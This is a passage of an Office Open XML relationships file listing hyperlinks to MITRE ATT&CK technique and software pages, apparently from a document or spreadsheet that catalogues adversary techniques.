Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1019" TargetMode="External"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1002" TargetMode="External"/><Relationship Id="rId189" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1136" TargetMode="External"/><Relationship Id="rId375" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1166" TargetMode="External"/><Relationship Id="rId396" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1193" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134" TargetMode="External"/><Relationship Id="rId214" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1141" TargetMode="External"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1149" TargetMode="External"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1112" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1050" TargetMode="External"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1120" TargetMode="External"/><Relationship Id="rId400" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1194" TargetMode="External"/><Relationship Id="rId421" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1082" TargetMode="External"/><Relationship Id="rId442" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1099" TargetMode="External"/><Relationship Id="rId463" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1100" TargetMode="External"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1140" TargetMode="External"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1129" TargetMode="External"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1210" TargetMode="External"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1150" TargetMode="External"/><Relationship Id="rId323" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1163" TargetMode="External"/><Relationship Id="rId344" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1138" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1067" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1059" TargetMode="External"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1003" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1144" TargetMode="External"/><Relationship Id="rId365" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1101" TargetMode="External"/><Relationship Id="rId386" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1216" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1143" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1066" TargetMode="External"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1142" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1177" TargetMode="External"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1128" TargetMode="External"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1097" TargetMode="External"/><Relationship Id="rId411" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1165" TargetMode="External"/><Relationship Id="rId432" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1124" TargetMode="External"/><Relationship Id="rId453" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1065" TargetMode="External"/><Relationship Id="rId474" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1220" TargetMode="External"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1025" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1189" TargetMode="External"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1186" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1098" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1064" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1042" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1122" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1002" TargetMode="External"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1190" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1107" TargetMode="External"/><Relationship Id="rId334" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1219" TargetMode="External"/><Relationship Id="rId355" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1029" TargetMode="External"/><Relationship Id="rId376" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1051" TargetMode="External"/><Relationship Id="rId397" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1134" TargetMode="External"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1144" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1130" TargetMode="External"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1171" TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1170" TargetMode="External"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1050" TargetMode="External"/><Relationship Id="rId401" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1194" TargetMode="External"/><Relationship Id="rId422" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1016" TargetMode="External"/><Relationship Id="rId443" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036" TargetMode="External"/><Relationship Id="rId464" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1077" TargetMode="External"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1205" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1067" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1081" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1129" TargetMode="External"/><Relationship Id="rId345" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1018" TargetMode="External"/><Relationship Id="rId387" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1198" TargetMode="External"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1143" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1070" TargetMode="External"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1177" TargetMode="External"/><Relationship Id="rId412" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1169" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1001" TargetMode="External"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1174" TargetMode="External"/><Relationship Id="rId454" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1204" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1182" TargetMode="External"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1146" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1211" TargetMode="External"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1186" TargetMode="External"/><Relationship Id="rId356" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1029" TargetMode="External"/><Relationship Id="rId398" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1192" TargetMode="External"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1132" TargetMode="External"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1133" TargetMode="External"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1130" TargetMode="External"/><Relationship Id="rId423" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1016" TargetMode="External"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1170" TargetMode="External"/><Relationship Id="rId465" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1077" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1179" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1043" TargetMode="External"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1089" TargetMode="External"/><Relationship Id="rId325" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1164" TargetMode="External"/><Relationship Id="rId367" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1167" TargetMode="External"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1222" TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1159" TargetMode="External"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1046" TargetMode="External"/><Relationship Id="rId434" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1080" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1020" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1157" TargetMode="External"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1096" TargetMode="External"/><Relationship Id="rId336" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1076" TargetMode="External"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1090" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1048" TargetMode="External"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1061" TargetMode="External"/><Relationship Id="rId378" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1023" TargetMode="External"/><Relationship Id="rId403" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1184" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1015" TargetMode="External"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1168" TargetMode="External"/><Relationship Id="rId445" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1154" TargetMode="External"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1201" TargetMode="External"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1013" TargetMode="External"/><Relationship Id="rId347" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1091" TargetMode="External"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1217" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1214" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1203" TargetMode="External"/><Relationship Id="rId389" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1045" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1148" TargetMode="External"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1139" TargetMode="External"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1185" TargetMode="External"/><Relationship Id="rId414" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1206" TargetMode="External"/><Relationship Id="rId456" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1078" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1103" TargetMode="External"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1074" TargetMode="External"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1188" TargetMode="External"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1093" TargetMode="External"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1115" TargetMode="External"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1022" TargetMode="External"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1175" TargetMode="External"/><Relationship Id="rId358" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1113" TargetMode="External"/><Relationship Id="rId162" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1028" TargetMode="External"/><Relationship Id="rId218" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1118" TargetMode="External"/><Relationship Id="rId425" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1049" TargetMode="External"/><Relationship Id="rId467" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1047" TargetMode="External"/><Relationship Id="rId271" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1126" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1010" TargetMode="External"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1092" TargetMode="External"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1173" TargetMode="External"/><Relationship Id="rId327" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1108" TargetMode="External"/><Relationship Id="rId369" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1035" TargetMode="External"/><Relationship Id="rId173" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1006" TargetMode="External"/><Relationship Id="rId229" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1160" TargetMode="External"/><Relationship Id="rId380" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036" TargetMode="External"/><Relationship Id="rId436" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1221" TargetMode="External"/><Relationship Id="rId240" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1053" TargetMode="External"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1139" TargetMode="External"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/software/S0040" TargetMode="External"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1213" TargetMode="External"/><Relationship Id="rId282" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1027" TargetMode="External"/><Relationship Id="rId338" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1021" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1087" TargetMode="External"/><Relationship Id="rId142" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1041" TargetMode="External"/><Relationship Id="rId184" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1200" TargetMode="External"/><Relationship Id="rId391" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1153" TargetMode="External"/><Relationship Id="rId405" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1071" TargetMode="External"/><Relationship Id="rId447" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1127" TargetMode="External"/><Relationship Id="rId251" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1036" TargetMode="External"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1176" TargetMode="External"/><Relationship Id="rId293" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1110" TargetMode="External"/><Relationship Id="rId307" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1086" TargetMode="External"/><Relationship Id="rId349" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1014" TargetMode="External"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1094" TargetMode="External"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1030" TargetMode="External"/><Relationship Id="rId153" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1212" TargetMode="External"/><Relationship Id="rId195" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1179" TargetMode="External"/><Relationship Id="rId209" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1202" TargetMode="External"/><Relationship Id="rId360" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1180" TargetMode="External"/><Relationship Id="rId416" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1195" TargetMode="External"/><Relationship Id="rId220" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1208" TargetMode="External"/><Relationship Id="rId458" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1125" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055" TargetMode="External"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1191" TargetMode="External"/><Relationship Id="rId262" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1104" TargetMode="External"/><Relationship Id="rId318" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1055" TargetMode="External"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1213" TargetMode="External"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1038" TargetMode="External"/><Relationship Id="rId164" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1181" TargetMode="External"/><Relationship Id="rId371" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1058" TargetMode="External"/><Relationship Id="rId427" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1033" TargetMode="External"/><Relationship Id="rId469" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1084" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1123" TargetMode="External"/><Relationship Id="rId231" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1152" TargetMode="External"/><Relationship Id="rId273" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1135" TargetMode="External"/><Relationship Id="rId329" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1060" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1223" TargetMode="External"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1114" TargetMode="External"/><Relationship Id="rId175" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1044" TargetMode="External"/><Relationship Id="rId340" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1105" TargetMode="External"/><Relationship Id="rId200" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://attack.mitre.org/techniques/T1183" TargetMode="External"/><Relationship Id="rId382" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" 